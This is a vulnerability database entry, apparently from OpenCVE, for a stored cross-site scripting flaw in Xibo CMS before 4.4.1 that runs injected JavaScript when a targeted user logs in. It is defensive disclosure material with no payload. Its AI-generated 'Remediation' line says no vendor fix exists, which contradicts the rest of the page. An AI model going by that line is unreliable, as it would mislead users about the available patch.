Description
Xibo is an open source digital signage platform with a web content management system and Windows display player software. A stored Cross-Site Scripting (XSS) vulnerability in versions prior to 4.4.1 allows an authenticated user with notification creation permissions to inject arbitrary JavaScript into the notification body. When the notification is set as an "interrupt," the payload executes automatically in the browser of any targeted user upon login, requiring zero user interaction. Exploitation of the vulnerability is possible on behalf of an authorized user who has both of the following privileges, which are not granted to non-admins as standard: Access to the Notification Centre to view past notifications, and include "Add Notification" button to allow for the creation of new notifications. Users should upgrade to version 4.4.1 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust.
Published: 2026-04-24
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting with zero‑click execution
Action: Immediate Patch
AI Analysis

Impact

A stored Cross‑Site Scripting flaw exists in Xibo CMS versions prior to 4.4.1. An authenticated user who can create notifications can inject arbitrary JavaScript into the notification body. When the notification is marked as "interrupt," the payload automatically runs in the browser of any user that logs in, without requiring any additional action from that user. This weakness is described by CWE‑79.

Affected Systems

The vulnerability affects the Xibo CMS platform provided by xibosignage. Any installation running a version older than 4.4.1 is susceptible. The change introduces a fix in release 4.4.1; all earlier releases remain vulnerable.

Risk and Exploitability

The CVSS v3.1 score is 6.4, indicating a medium threat level. The EPSS score of less than 1% suggests that exploitation is rare, and the vulnerability is not listed in CISA’s KEV catalog. However, the exploit requires an authenticated account with notification‑creation privileges, a role normally reserved for administrators. Once executed, the JavaScript runs within the victim’s browser context during login, which can be used by an attacker to perform malicious client‑side actions.

Generated by OpenCVE AI on April 28, 2026 at 14:29 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Xibo CMS to version 4.4.1 or later to apply the vendor patch.
  • Revoke notification centre view and add‑notification privileges from users who do not need them.
  • If an upgrade is pending, delete or disable any existing interrupt notifications that may contain malicious content and prevent the creation of new notifications until the fix is applied.

Generated by OpenCVE AI on April 28, 2026 at 14:29 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 27 Apr 2026 14:45:00 +0000

Type Values Removed Values Added
First Time appeared Xibosignage
Xibosignage xibo
CPEs cpe:2.3:a:xibosignage:xibo:*:*:*:*:*:*:*:*
Vendors & Products Xibosignage
Xibosignage xibo

Fri, 24 Apr 2026 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 24 Apr 2026 01:15:00 +0000

Type Values Removed Values Added
Description Xibo is an open source digital signage platform with a web content management system and Windows display player software. A stored Cross-Site Scripting (XSS) vulnerability in versions prior to 4.4.1 allows an authenticated user with notification creation permissions to inject arbitrary JavaScript into the notification body. When the notification is set as an "interrupt," the payload executes automatically in the browser of any targeted user upon login, requiring zero user interaction. Exploitation of the vulnerability is possible on behalf of an authorized user who has both of the following privileges, which are not granted to non-admins as standard: Access to the Notification Centre to view past notifications, and include "Add Notification" button to allow for the creation of new notifications. Users should upgrade to version 4.4.1 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust.
Title Xibo CMS has Stored XSS via Notification Body with Zero-Click Execution on Login
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Xibosignage Xibo
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-24T18:18:24.562Z

Reserved: 2026-03-10T15:10:10.657Z

Link: CVE-2026-31953

cve-icon Vulnrichment

Updated: 2026-04-24T17:06:17.410Z

cve-icon NVD

Status : Analyzed

Published: 2026-04-24T01:16:11.000

Modified: 2026-04-27T14:43:00.820

Link: CVE-2026-31953

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-28T14:30:33Z

Weaknesses